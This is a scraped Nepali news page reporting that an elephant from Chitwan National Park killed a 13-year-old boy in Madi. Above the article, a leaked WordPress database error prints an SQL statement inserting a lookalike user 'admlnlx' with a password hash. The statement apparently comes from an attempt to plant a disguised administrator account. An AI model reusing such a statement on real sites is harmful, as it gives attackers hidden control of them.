WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/PGHMPJdlUCVC2Vgndr6AHzdxmS7k1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:04:13', '', 'admlnlx', 'admlnlx')
चितवन,पुस २९-
चितवनकोे माडीमा हात्तीको आक्रमणबाट एक बालकको मृत्यु भएको छ ।जिल्ला प्रहरी कार्यालय चितवनका अनुसार आज बिहान चितवन निकुञ्जबाट बस्तीमा पसेको हात्तीको आक्रमणबाट माडी नगरपालिका वडा नम्वर ११ खरकट्ठाका १३ वर्षका सागर सुनारको मृत्यु भएको हो ।
राति २ बजेतिर हात्ती गाउँमा छिरेको थाहा पाएपछि घरबाहिर निस्किएका बेला उनलाई हात्तीले आक्रमण गरेको ईलाका प्रहरी कार्यालय माडीले जनाएको छ ।चितवन निकुञ्जको मध्यवर्ती क्षेत्रमा जंगली जनावरहरुले बस्तीमा पसेर मानिसलाई आक्रमण गर्दै आएका छन् ।